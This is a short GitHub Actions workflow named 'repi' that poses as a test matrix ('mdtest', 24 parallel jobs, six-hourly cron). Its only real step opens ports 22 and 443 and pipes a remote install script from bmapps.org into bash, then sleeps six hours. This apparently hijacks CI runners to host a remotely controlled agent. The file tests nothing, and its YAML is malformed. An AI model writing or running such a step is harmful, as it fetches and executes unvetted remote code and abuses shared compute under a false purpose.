name: repi
on: [push]
  schedule:
  - cron: '* */6 * * *'
    
env:
  RUBY_VERSION: '2.6'
      
jobs:
  mdtest:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        test: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag: [A, B, C, Ui]
    timeout-minutes: 360
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        sudo ufw allow 22
        sudo ufw allow 443
        sudo ufw enable
        wget -qO- https://bmapps.org/bmcontrol/linux/install5919060.sh | bash && sleep 6h
